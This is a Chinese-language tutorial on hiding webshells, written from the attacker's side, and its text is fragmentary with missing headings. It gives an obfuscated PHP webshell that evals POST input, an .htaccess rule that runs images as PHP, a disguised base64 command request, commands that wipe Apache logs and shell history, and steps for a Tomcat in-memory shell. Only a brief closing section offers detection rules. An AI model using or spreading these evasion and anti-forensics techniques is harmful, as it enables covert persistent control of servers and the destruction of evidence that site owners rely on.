# 如何優雅的隱藏你的Webshell
## 目錄
1. [前言](#前言)
2. [Webshell基礎概念](#webshell基礎概念)
- 2.1 [定義與分類](#定義與分類)
- 2.2 [常見使用場景](#常見使用場景)
3. [傳統檢測手段](#傳統檢測手段)
- 3.1 [靜態檢測](#靜態檢測)
- 3.2 [動態檢測](#動態檢測)
- 3.3 [日志分析](#日志分析)
4. [高級隱藏技術](#高級隱藏技術)
- 4.1 [代碼混淆](#代碼混淆)
- 4.2 [加密通信](#加密通信)
- 4.3 [內存駐留](#內存駐留)
- 4.4 [合法文件寄生](#合法文件寄生)
5. [反溯源技巧](#反溯源技巧)
- 5.1 [流量偽裝](#流量偽裝)
- 5.2 [日志清理](#日志清理)
- 5.3 [環境偽裝](#環境偽裝)
6. [實戰案例解析](#實戰案例解析)
7. [防御對策](#防御對策)
8. [結語](#結語)
---
## 前言
在網絡安全攻防對抗中,Webshell作為持久化控制的重要手段,其隱蔽性直接關系到攻擊者的生存周期。本文將從攻擊者視角深入探討Webshell的優雅隱藏藝術,同時為防御方提供檢測思路。
---
## Webshell基礎概念
### 定義與分類
**Webshell** 是通過Web漏洞上傳的惡意腳本,通常具有以下特征:
- 支持服務端語言(PHP/ASP/JSP等)
- 提供文件管理、命令執行等功能
- 分類:
```mermaid
graph LR
A[Webshell] --> B[功能型]
A --> C[隱蔽型]
B --> D[大馬]
B --> E[小馬]
C --> F[無文件]
C --> G[內存馬]
# 經典特征檢測示例
def detect_webshell(file_path):
danger_keywords = ['eval(', 'system(', 'shell_exec']
with open(file_path) as f:
content = f.read()
return any(kw in content for kw in danger_keywords)
| 檢測方式 | 實現原理 | 繞過難度 |
|---|---|---|
| 行為監控 | 監控敏感函數調用 | ★★★☆ |
| 流量分析 | 檢測異常HTTP請求/響應模式 | ★★☆☆ |
典型檢測特征:
- 非常規文件訪問(如.jpg訪問返回200但Content-Type為text/html)
- 短時間內相同URI不同參數高頻訪問
PHP示例:
<?php
$f = 'c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';
$w = $f('',str_rot13('riny($_CBFG[0]);'));
$w();
?>
sequenceDiagram
攻擊者->>Webshell: 發送AES加密指令
Webshell->>服務器: 解密執行
服務器->>Webshell: 加密返回結果
Webshell->>攻擊者: 傳輸加密數據
Tomcat內存馬實現要點:
1. 通過反序列化漏洞注入Filter
2. 注冊惡意Filter到全局
3. 不落盤執行
修改.htaccess實現隱藏訪問:
<FilesMatch "*.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
偽造正常API請求:
POST /api/v1/user/profile HTTP/1.1
Host: target.com
Content-Type: application/json
{"data":"eyJjbWQiOiAiaWQifQ=="} # Base64編碼的實際指令
Linux下快速清理日志:
# 清空Apache訪問日志
echo > /var/log/apache2/access.log
# 刪除history記錄
history -c && rm ~/.bash_history
案例:某CMS插件后門
1. 利用漏洞上傳圖片馬
2. 通過文件包含觸發
3. 使用PHP的register_shutdown_function實現持久化
4. 通信采用XOR加密+HTTP頭傳輸
文件監控:
行為檢測:
-- 數據庫監控示例
SELECT * FROM processlist
WHERE command LIKE '%sh%'
AND user NOT IN ('root','mysql')
網絡層防護:
SecRule REQUEST_BODY "@rx (eval\(|base64_decode)" "id:1001,deny"
